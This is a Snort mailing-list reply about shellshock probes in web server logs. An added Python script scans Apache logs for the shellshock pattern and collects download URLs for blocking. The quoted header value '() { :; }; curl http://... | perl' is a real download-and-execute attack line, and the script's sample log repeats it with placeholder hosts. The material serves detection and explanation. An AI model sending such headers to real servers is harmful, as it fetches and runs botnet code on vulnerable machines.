Snort mailing list archives

Re: Odd http requests in the logs


From: waldo kitty <wkitty42 () windstream net>
Date: Mon, 03 Nov 2014 14:15:21 -0500

On 11/2/2014 11:23 PM, Richard Geddes wrote:
> Hello,
>
> I received a few (9) events in my web logs with the following fields:
>
> agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png |
> perl"
>
> referrer : "() { :; }; curl
> http://202.28.77.53/~prajaks/310482/index.png | perl"

these are shellshock attempts... they are trying to use a macro hole in the bash 
command interpreter...

> downloaded index.png, and it turns out to be a base64 encoded perl
> script that has comments about a botnet.  It seems to target apache.

yes, that script is a "2nd phase" that's only operational if the shellshock 
bypass attempt works... it also requires curl and perl to be installed and 
operational... curl for the retrieval and perl for the botnet script execution...

> I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense,
> snort, and the snort rules are up-to-date

do you have the shellshock detection rules enabled?

> snort seems to be passing these requests on to my web server, and it
> seems to me they should be blocked.

does the pfsense installation of snort operate as IDS (intrusion detection 
system) or IPS (intrusion protection system)?

in either case, if the rules are not enabled to detect this problem, snort won't 
react to traffic that matches...

> I don't know enough about how web servers and log handlers process this
> data to determine if it's a threat.

the way it works is if those fields are processed by a bash CLI session... they 
create a macro that bash doesn't properly handle and it executes the commands 
after the semi-colon ";"... that's the bug... bash should stop processing the 
macro when it sees the semi-colon... if you are running a *nix OS, you should 
have already gotten several security updates fixing this problem...

> Is there a way to tell snort to block http requests with these fields?
> The source of the malicious file should probably be regex'd in case
> there are alternate sources of this file.

blocking depends on your installation and its capabilities...

-- 
  NOTE: No off-list assistance is given without prior approval.
        Please *keep mailing list traffic on the list* unless
        private contact is specifically requested and granted.
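The thread asks how to pick these header values out of the web logs and regex out the download source. The following is an added example, not code from either poster: it scans Apache combined-format log lines for the shellshock function-definition pattern in the Referer and User-Agent fields and collects any fetch URLs from the payload for blocklisting. The log lines and the 198.51.100.x / 203.0.113.x addresses are constructed placeholders, not the hosts from the thread.

```python
import re
from typing import Iterable, List, NamedTuple, Set

# Apache "combined" log format; the referrer and agent fields are where the
# two header values quoted in the thread end up.
COMBINED_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock signature: an exported function definition "() {" followed by
# commands after the closing "};". Whitespace is optional so that "(){ :;};"
# and "() { :; };" are both caught.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{.*?\}\s*;(?P<payload>.*)$', re.DOTALL)

# Any URL the trailing commands try to fetch (the "source of the malicious
# file" the poster wants to regex out, whatever host it happens to be).
URL_RE = re.compile(r'https?://[^\s|;"\']+')

class Hit(NamedTuple):
    src: str        # client address that sent the request
    field: str      # "referrer" or "agent"
    payload: str    # commands that follow the function definition
    urls: tuple     # fetch URLs found in the payload

def scan_log(lines: Iterable[str]) -> List[Hit]:
    """Return one Hit per header field carrying the shellshock pattern."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("referrer", "agent"):
            s = SHELLSHOCK_RE.search(m.group(field))
            if s:
                payload = s.group("payload").strip()
                hits.append(Hit(m.group("src"), field, payload,
                                tuple(URL_RE.findall(payload))))
    return hits

def blocklist_urls(hits: Iterable[Hit]) -> Set[str]:
    """Distinct second-stage download URLs seen across all hits."""
    return {u for h in hits for u in h.urls}

# Constructed sample: one probe (pattern in both fields) and one normal request.
SAMPLE_LOG = [
    '198.51.100.10 - - [02/Nov/2014:23:10:41 -0500] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"() { :; }; curl http://203.0.113.7/~user/index.png | perl" '
    '"() { :; }; curl http://203.0.113.7/~user/index.png | perl"',
    '203.0.113.42 - - [02/Nov/2014:23:11:02 -0500] "GET /index.html HTTP/1.1" 200 2048 '
    '"http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
]
```

Feeding a real access log through `scan_log` gives the source addresses and fetch URLs to compare against what the Snort shellshock rules alerted on.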
